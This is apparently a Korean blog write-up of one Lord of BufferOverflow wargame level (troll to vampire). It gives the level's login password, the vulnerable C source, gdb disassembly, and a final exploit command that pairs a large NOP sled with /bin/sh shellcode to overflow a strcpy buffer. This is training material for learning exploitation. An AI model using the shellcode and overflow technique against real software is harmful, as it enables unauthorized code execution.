반응형

login : troll

password : aspirin

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

argv 48번째가 xbf여야하고 47번째는 xff가 아니여야한다. 0xbfff___식이 아니라는것이다.

 

0x8048477 <main+71>:    add    $0x4,%esp
0x804847a <main+74>:    lea    0x0(%esi),%esi
0x8048480 <main+80>:    mov    0xc(%ebp),%eax
0x8048483 <main+83>:    add    $0x4,%eax
0x8048486 <main+86>:    mov    (%eax),%edx
0x8048488 <main+88>:    add    $0x2e,%edx
0x804848b <main+91>:    cmpb   $0xff,(%edx)
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   $0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    $0x4,%esp
0x804849d <main+109>:   push   $0x0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    $0x4,%esp
0x80484a7 <main+119>:   mov    0xc(%ebp),%eax
0x80484aa <main+122>:   add    $0x4,%eax
0x80484ad <main+125>:   mov    (%eax),%edx
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    0xffffffd8(%ebp),%eax
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    $0x8,%esp
0x80484bc <main+140>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   $0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    $0x8,%esp
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop

 strcpy 0x80484b4 에 break point를 걸고 

 r `python -c 'print "\x90"*44 +"\xbf\xbf\xbf\xbf"'`

페이로드로 써야하는 주소가 다 0xbfff___인데 쓰질못한다....

전 문제에있던 argv 수 제한이 없으니 nop slep으로 bfff를 벗어나게 하면 어떨까?

 

`python -c 'print "\x90"*44 + "\xbf\xbf\xbf\xbf" + "\x90"*50000'`

5만개를 넣었는데 한참 부족한거같다;

50000개후 esp
100000개 넣었다.

 

 

./vampire `python -c 'print"\x90"*44+"\xc0\x74\xfe\xbf" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`

 

music world

반응형

'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글

[Lord Of BufferOverFlow] 11번 skeleton -> golem  (0) 2021.02.27
[Lord Of BufferOverFlow] 10번 vampire -> skeleton  (0) 2021.02.26
[Lord Of BufferOverFlow] 8번 orge -> troll  (0) 2021.02.26
[Lord Of BufferOverFlow] 7번 darkelf -> orge  (0) 2021.02.26
[Lord Of BufferOverFlow] 6번 wolfman -> darkelf  (0) 2021.02.25

티스토리툴바